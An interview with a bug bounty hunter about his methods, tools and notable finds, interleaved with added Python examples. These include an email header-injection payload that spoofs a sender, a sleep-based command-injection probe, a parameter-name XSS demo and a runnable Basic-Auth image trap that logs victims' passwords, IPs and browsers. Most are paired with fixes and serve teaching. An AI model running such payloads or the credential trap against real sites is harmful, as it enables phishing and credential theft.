AMA with @samwcyo

Thank you for doing this interview! Can you please introduce yourself?

My real-life name is Sam, but I go by “zlz” on HackerOne and Twitter. I’m from the central United States and I’ve been hacking for about three years now. I got started after spending some time on a game called “Runescape” and exploiting non-technical logical issues like invisibility through a series of permitted actions within the client. I’m in love with HackerOne as of now and will probably be staying for a while.

Q: How do you manage your personal life, work, and bug bounties? Do you do bug bounties as a job or a hobby?

At the moment the only obligations I have are my work, girlfriend, and family. I’ll spend pretty much every night (11:00 P.M.-4:00 A.M.) on my computer either reading or hacking stuff, but this will change once the summer is over. If you haven’t already guessed, bug bounty is just a hobby for me, but one that consumes a huge portion of my interests. It’s sometimes hard to manage my personal life because I’ll get super obsessed with an endpoint to the point of having it cloud my thoughts the next day. I’ve learned to systematically schedule my day so each event is isolated from the others, but it can be hard to mentally force myself into this pattern.

Q: How much time do you spend on Hunting for Bugs? On average, how many bugs do you think you report per month?

Each day I’ll spend maybe six hours doing infosec-related stuff, but only about two of those are designated to actual hunting. Based on that I’m probably spending anywhere between 14 and 18 hours hunting bugs. I think it’s very important to spend time reading up on current events and techniques you have little experience with, because one day you’ll glance over something during pentesting and either say “hey, I think I know what this is! <insert payload>” or, if you haven’t been reading that much, “that is confusing, but I guess I can come back to it or phone a friend”. I’ll report anywhere between 5 and 15 bugs in a month, but lately I’ve been spending more time searching for more critical bugs so that number has dipped.

Q: How long did it take you until you found your first significant/high impact/payout vulnerability?

Seven months, ten duplicates, four N/As, and one valid low severity.

Q: Of all the bugs you’ve found, what was your favorite/most interesting?

My favorite (and most interesting) bug was when I was able to inject carriage-return line-feed symbols into a Yahoo mail function. What I was able to accomplish was (1) the ability to pretend to be any “@yahoo.com”, and (2) spear phishing victims using malicious attachments and hyperlinks. This bug was really interesting because I hadn’t ever seen anyone exploiting this nor writing about it. It was very similar to HTTP header injection but just with email headers. You can read the writeup here if you’d like.
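The email header injection mechanism described in this answer, as an added example that is not code from the interview or from Yahoo Mail: a hypothetical “share by email” builder that concatenates a user-supplied subject straight into the header block, a parser that shows the resulting second From and hidden Bcc the way a receiving MTA would see them, and a hardened builder using Python’s EmailMessage, which under its default policy refuses any header value containing CR or LF. All addresses and the payload are placeholders constructed for the example.

```python
from __future__ import annotations

from email.message import EmailMessage

CRLF = "\r\n"
# Headers the legitimate builder is supposed to emit, exactly once each.
EXPECTED_HEADERS = ("From", "To", "Subject", "Content-Type")


def build_message_naive(sender: str, recipient: str, subject: str, body: str) -> str:
    """Vulnerable: header values are interpolated with no CR/LF filtering, so a
    subject containing CRLF starts new header lines of the attacker's choosing."""
    headers = [
        f"From: {sender}",
        f"To: {recipient}",
        f"Subject: {subject}",
        "Content-Type: text/plain; charset=utf-8",
    ]
    return CRLF.join(headers) + CRLF + CRLF + body


def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Split the header block the way a receiving MTA would: one name/value
    pair per line up to the first blank line, duplicates kept."""
    head = raw.replace(CRLF, "\n").partition("\n\n")[0]
    pairs = []
    for line in head.split("\n"):
        name, _, value = line.partition(":")
        pairs.append((name.strip(), value.strip()))
    return pairs


def find_injected_headers(raw: str) -> list[str]:
    """Header names that are either unexpected or repeat an expected header."""
    seen, injected = set(), []
    for name, _ in parse_headers(raw):
        if name not in EXPECTED_HEADERS or name in seen:
            injected.append(name)
        seen.add(name)
    return injected


def build_message_safe(sender: str, recipient: str, subject: str, body: str) -> str:
    """Hardened: EmailMessage (default policy) raises ValueError for a header
    value containing CR or LF, so the injected lines never reach the wire."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    return msg.as_string()


def rejects_injection(subject: str) -> bool:
    """True when the hardened builder refuses this subject."""
    try:
        build_message_safe("share@mail.example.com", "friend@example.com", subject, "see link")
    except ValueError:
        return True
    return False


# Constructed payload: a "share" subject that smuggles a spoofed From and a
# hidden Bcc. In the real bug the injected headers came from a Yahoo Mail
# parameter; here the addresses are placeholders.
INJECTED_SUBJECT = "Check this out" + CRLF + "From: ceo@yahoo.com" + CRLF + "Bcc: victim@example.com"

if __name__ == "__main__":
    raw = build_message_naive("share@mail.example.com", "friend@example.com", INJECTED_SUBJECT, "see link")
    print(raw)
    print("injected headers:", find_injected_headers(raw))
    print("hardened builder rejects it:", rejects_injection(INJECTED_SUBJECT))
```

The same idea extends to the body: once the attacker can end the header block, a second CRLF pair lets them supply their own Content-Type and MIME parts, which is how attachments and hyperlinks get in. The check that matters is on the server before the message is assembled; rejecting or stripping CR and LF from every user-controlled header value closes the whole class.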

Q: When and how did you have your breakthrough? When did you realize hacking and bug bounties was something you wanted to dedicate your time to? Please share your insights and the problems you faced to becoming an established bug bounty hacker?

Thinking back in time a little bit, I had two moments when I knew I wanted to get fully involved with bug bounty. The first was when I received a $250 bounty from PornHub after emailing their security handle and stating that they had invalidly closed my report, and the second was when I met Jon Bottarini and he invited me to the “bug bounty forum” Slack group. It may sound super staged since this AMA is being hosted on bug bounty forum, but when I joined the community I felt super comfortable since everyone was super friendly and resourceful. From that point forward I established relationships with people who are now really close friends. One of my biggest insights as a hacker is that the “HTTP tamper” Firefox extension shouldn’t be my go-to proxy tool. For any new hackers out there, please learn how to use BURP Suite. It’s an AWESOME tool that may look a little intimidating at first, but it provides such an extensible array of tools that can be used in your day-to-day arsenal. One of the biggest issues I had was overcoming the mental gap of “the vulnerabilities on this host are few and far between, so it’s not worth pentesting”. The way in which I did so was deciding to primarily target the host I was so scared of until I identified SOMETHING vulnerable. It worked because when I did find that vulnerability, I felt as if there were dozens more just around the corner.

Q: What do you do to keep up with all the new trends?

I’ll spend a few hours on Twitter reading blogs, articles, and forum listings relative to infosec. I’d really recommend establishing a network of hackers to follow in order to easily get updates and content from within the community.

Q: Do you collaborate with other hackers? Can you name a few?

Of course. I spend a lot of time pentesting on Yahoo with @thedawgyg, speak to @jon_bottarini frequently, and keep in touch with @ibram and @RojanRijal about potential and current projects we’re working on.

Technical Questions

Q: How do you approach a target? What is your routine like? What is your recon process like? What kind of information do you seek in your information gathering process? And how does this information help you?

Before I ever start a scan (if it’s a new host) I’ll just load the website normally and try to understand its structure. I’ll keep notes of directories that I’ll go back and dir bruteforce later, file extensions, and different servers (noticing altering patterns of nginx, apache, etc.). After a while I’ll switch to a more active session where I’ll check each request one-by-one as well as any areas that I’ve marked as potentially vulnerable (file uploads, update profile, etc.). After a while I’ll brute force subdomains and fingerprint each one individually. The information I’m looking for is anything that will help increase severity of a discovered vulnerability or vulnerabilities themselves. I’d recommend a session spent understanding a host before actively looking for vulnerabilities. If you see something you’ve never seen before then spend some time getting to know it. There have been times where I’ve replicated environments so I could see what would work, wouldn’t work, and the result of each request.

Q: Do you always look for all vulnerabilities types when you approach a website?

Both yes and no. If I see something that looks vulnerable to something specific, I’ll attack it with whatever’s specific. Most of the time I approach a website with an open mind, but if there’s something individually I want to look for then I’ll orient myself to look for that. I keep references of file upload, image update, and interesting little functions that may one day be vulnerable to something cool (an example is the recent FFmpeg vulnerability).

Q: Do you use any tools? Do you have your own tools that you have written to automate/facilitate your work? What Burp extensions do you use? Is there a tool that not a lot of people use that you think they should?

I’ll use sublist3r and dirsearch, but that’s about it. No. I’d recommend using “PwnBack” for BURP Suite as it allows you to check the site as it was in the past. A lot of the time you’ll discover that developers never deleted that old vulnerable file. I’d love to start developing my own tools but don’t have an issue that I’d like to solve as of now.

Q: This is one of our most popular questions: How do you test for Server Side vulnerabilities such as RCE, SQLi, etc?

I’ll use input like “sleep” when checking for code/command/SQL injection, but host a separate domain that logs all DNS requests for SSRF. This area can be iffy, because most of the time you’re attempting one of these server side vulnerabilities there won’t be a window to see what’s going on. My best tip for this is to check the program’s policies. If they don’t want you to use an automated scanner, then don’t use an automated scanner. If that’s not listed then by all means use SQLmap to prove that there is in fact a vulnerability. As a hacker you shouldn’t ever overextend your engagement unless explicit permission is granted. There are dozens of stories where people have lost 50-100% of their bounties for sending “cat dbpasswords.txt” instead of “touch iwashere”.
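The “sleep” check described in this answer, as an added example (not code from the interview or from any program): a hypothetical endpoint that splices user input into a shell command, a time-based probe that decides injection purely from the delay, and two fixes, the shlex-quoted form for when a shell is unavoidable and the argv form that avoids the shell entirely. The sleep payload is the point: it proves execution without reading or writing anything on the box, which is the “touch iwashere” level of evidence the answer recommends. It assumes a POSIX shell and a `sleep` binary on the machine running it.

```python
import shlex
import subprocess
import time

SLEEP_SECONDS = 1
THRESHOLD = 0.8 * SLEEP_SECONDS
# Constructed payload: benign-looking host followed by a shell-injected delay.
SLEEP_PAYLOAD = f"example.com; sleep {SLEEP_SECONDS}"


def lookup_vulnerable(host: str) -> str:
    """Hypothetical endpoint: user input spliced into a shell command line,
    so ';', '|', '$(...)' and friends are interpreted by /bin/sh."""
    cmd = f"echo Resolving {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_quoted(host: str) -> str:
    """If a shell is unavoidable, shlex.quote turns the input into one word."""
    cmd = f"echo Resolving {shlex.quote(host)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_safe(host: str) -> str:
    """Preferred fix: no shell at all; the input occupies exactly one argv slot."""
    return subprocess.run(["echo", "Resolving", host], capture_output=True, text=True).stdout


def timed_call(fn, arg: str):
    """Return (elapsed_seconds, output) for one call of fn(arg)."""
    start = time.monotonic()
    out = fn(arg)
    return time.monotonic() - start, out


def time_based_probe(fn, payload: str = SLEEP_PAYLOAD, baseline: str = "example.com") -> bool:
    """True when the delay payload slows the call past THRESHOLD while the
    baseline input stays fast. Only timing is used as evidence; the output
    is deliberately ignored because a blind injection gives you none."""
    base_t, _ = timed_call(fn, baseline)
    inj_t, _ = timed_call(fn, payload)
    return base_t < THRESHOLD <= inj_t


if __name__ == "__main__":
    for name, fn in [("vulnerable", lookup_vulnerable), ("quoted", lookup_quoted), ("safe", lookup_safe)]:
        print(f"{name:10s} injectable={time_based_probe(fn)} output={fn(SLEEP_PAYLOAD).strip()!r}")
```

Against a live target, repeat the measurement a few times and keep the baseline and payload requests adjacent, since network jitter alone can cross a small threshold; a delay of several seconds that tracks the number you put in the payload is far stronger evidence than a single slow response. The same probe shape works for SQL (`SLEEP()`, `pg_sleep()`, `WAITFOR DELAY`) and for code injection in most languages.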

Q: How often do you find a bug that has been overlooked after a bounty program has been established and a horde of researchers have been digging?

Pretty often. Something that stands out was an XSS I reported on sports.yahoo.com where I was able to inject inside the parameter instead of the parameter value. The request looked something like ?value[“a”]=1, but I changed it to ?value[“<script>”]=1 and it executed. This is a good example because I’ve never seen an automated tool that scans the parameter itself meaning that a pair of human eyes on a “scanned to death” portion of the site is all it really takes to find something interesting.
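The parameter-name reflection described in this answer, as an added example (not Yahoo’s code): a hypothetical page that echoes unknown form fields back to the user, escaping the value but trusting the key, beside the corrected version, plus a helper that enumerates both names and values as mutation points, which is exactly the slot a value-only scanner never touches. The field names and query strings are constructed for the example.

```python
from html import escape
from urllib.parse import parse_qsl

# Hypothetical PHP-style array fields the page knows about.
KNOWN_FIELDS = {'value["a"]', 'value["b"]'}


def render_vulnerable(query: str) -> str:
    """Only the value is escaped; the key is trusted because 'users don't type keys'."""
    parts = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in KNOWN_FIELDS:
            parts.append(f'<input name="{key}" value="{escape(value)}">')
        else:
            # Reflection of the raw key: ?value["<script>"]=1 lands here unescaped.
            parts.append(f"<p>Unknown field {key} ignored</p>")
    return "\n".join(parts)


def render_safe(query: str) -> str:
    """Both key and value are escaped before reaching the HTML."""
    parts = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in KNOWN_FIELDS:
            parts.append(f'<input name="{escape(key)}" value="{escape(value)}">')
        else:
            parts.append(f"<p>Unknown field {escape(key)} ignored</p>")
    return "\n".join(parts)


def injection_points(query: str) -> list:
    """Every slot a tester could mutate: names as well as values, in order."""
    points = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        points.append(("name", key))
        points.append(("value", value))
    return points


def reflected_unescaped(render, query: str, marker: str = "<script>") -> bool:
    """True when the marker survives rendering verbatim."""
    return marker in render(query)


if __name__ == "__main__":
    for q in ['value["<script>"]=1', 'value["a"]=<script>']:
        print(q, "->", reflected_unescaped(render_vulnerable, q), reflected_unescaped(render_safe, q))
    print(injection_points('value["a"]=1&value["b"]=2'))
```

When reviewing your own proxy history, look at any response that repeats a parameter name (error messages, “unknown field” notices, form re-population) and try the marker in the name before moving on; it takes one request per parameter and it is a slot most tooling leaves alone.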

Q: Do you think being a pentester, web developer, or being in a related field, helps you with bug bounties? Where should they start?

Yeah of course! There are DOZENS of places to start, but I’d personally suggest developing with a LAMP/WAMP stack (PHP, Apache, MySQL) in order to both create code and break code for those first couple poorly designed applications. I’ve known people who come from reverse engineering backgrounds as well as completely non-technical backgrounds.

Time to wrap it up!

Q: What kind of music do you listen to?

I listen to a lot of everything, but mainly Ska.

Q: What do you do when you aren’t hacking?

Breaking and entering - duh. Just kidding. I spend a lot of time job hunting and preparing for college.

Q: What kind of impact/role have bug bounties played in your life?

After just a few months of doing bug bounty I was able to purchase a car that everyone in my family uses. We used to be somewhat financially bent, but things have progressed since then. I’ve been working less at my fast food job and focusing more on school/career related ventures.

Q: What is one piece of advice you received as a beginner that helped you with your bug bounty career?

Nothing comes easy. Sure - maybe you hit the jackpot and find something by mistake - but that won’t repeat often. If you dedicate your time towards widening your scope of knowledge instead of slashing a knife at a program blindfolded you’re more likely to make a career out of it.

Q: What is one area of hacking (web, mobile, hardware, etc) you wish you knew more about / plan on focusing your learning on?

Low level stuff! Assembly! C! If it deals with memory, I couldn’t tell you more than a couple sentences about it.

Q: If someone with basic technical background asked you, “where should I start?”, what are 3 things you would recommend they do before diving into bug bounties?

  1. Put some time towards understanding the basics of the internet. What is HTTP? How does it work? What is a “SYN” request?
  2. Find a programming language you like and code in it for a while. You don’t have to get super involved, but spend some time making mistakes.
  3. Come to the realization that you’re probably not some genius who knows more than everyone. I’ve seen so many people fail in this because they feel that they’re some incredible computer prodigy because they succeeded in a smaller environment.

Q: Someone was eager to know, what do you put on your toast?

Cinnamon and butter!

Q: What’s your worst bug bounty story/experience?

Having something marked as invalid because it fell under the realm of “social engineering” through existing as a technical attack. Note: this was not me attempting to talk to a staff member, but an embeddable image being used to trigger “HTTP 401 Basic Authentication” on every page on the website. You seriously couldn’t browse without being asked to enter credentials that would go to my domain, and in addition it logged your browser agent and IP address.
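The embeddable-image trap described in this answer, as an added reconstruction that is not the original proof of concept: a tiny WSGI application that answers the first request with `401` and a `WWW-Authenticate: Basic` challenge so the browser prompts for credentials, then decodes whatever comes back and logs it with the client address and User-Agent. It is written as a plain WSGI callable so it can be exercised offline; the realm, hostname, log format and the 1x1 GIF are assumptions made for the example.

```python
import base64

# Constructed 1x1 transparent GIF so the <img> renders once the prompt is answered.
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
         b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
REALM = "mail.example.com"  # assumed: chosen to look like the victim site
LOG = []                    # in-memory stand-in for the attacker's log file
# What the attacker would plant in user-controlled HTML (assumed hostname).
EMBED_TAG = '<img src="http://trap.example.net/pixel.gif" alt="">'


def decode_basic(header: str):
    """Return (user, password) from 'Basic <base64>', or None if absent/malformed."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic" or not token.strip():
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, password = raw.partition(":")
    return user, password


def basic_header(user: str, password: str) -> str:
    """Build the Authorization header a browser sends after the prompt."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def trap_app(environ, start_response):
    """WSGI app: challenge until credentials arrive, log every hit."""
    creds = decode_basic(environ.get("HTTP_AUTHORIZATION", ""))
    LOG.append({"ip": environ.get("REMOTE_ADDR"),
                "ua": environ.get("HTTP_USER_AGENT"),
                "creds": creds})
    if creds is None:
        start_response("401 Unauthorized",
                       [("WWW-Authenticate", f'Basic realm="{REALM}"'),
                        ("Content-Type", "text/plain")])
        return [b"Authentication required"]
    start_response("200 OK", [("Content-Type", "image/gif")])
    return [PIXEL]


def call(app, environ):
    """Minimal WSGI driver for offline use; returns (status, headers, body)."""
    captured = {}

    def start_response(status, headers):
        captured["status"], captured["headers"] = status, dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


def browser_request(authorization=None, ip="203.0.113.7", ua="Mozilla/5.0 (constructed)"):
    """Constructed WSGI environ for a GET of the trap image."""
    env = {"REQUEST_METHOD": "GET", "PATH_INFO": "/pixel.gif",
           "REMOTE_ADDR": ip, "HTTP_USER_AGENT": ua}
    if authorization:
        env["HTTP_AUTHORIZATION"] = authorization
    return env


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    print("serving trap on http://127.0.0.1:8080/pixel.gif ; embed with:", EMBED_TAG)
    make_server("127.0.0.1", 8080, trap_app).serve_forever()
```

Two caveats for anyone reproducing this today. Only run it against a target whose program explicitly allows credential-harvesting style proofs, because the data it collects is real user secrets; logging the IP and User-Agent alone is usually enough to demonstrate the issue. And current browsers are much less cooperative than they were when this bug was reported: Chrome, for example, stopped showing the credential prompt for cross-origin subresources in version 59, so the image mostly fails silently now and the finding tends to be triaged as low impact.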

Q: If you had to pick one hacker to collaborate with, who would it be?

I’d probably pick @dawgyg. He’s a great hacker and we have matching approaches that work well together.

Q: What’s the one feature you would like to see in the platforms?

Additional documentation, tutorials, and demonstrations on how to manage taxes. There are a lot of people making a lot of money who don’t know anything about taxes.

Q: What’s your favorite text editor?

Notepad++. I’m a Windows fanboy.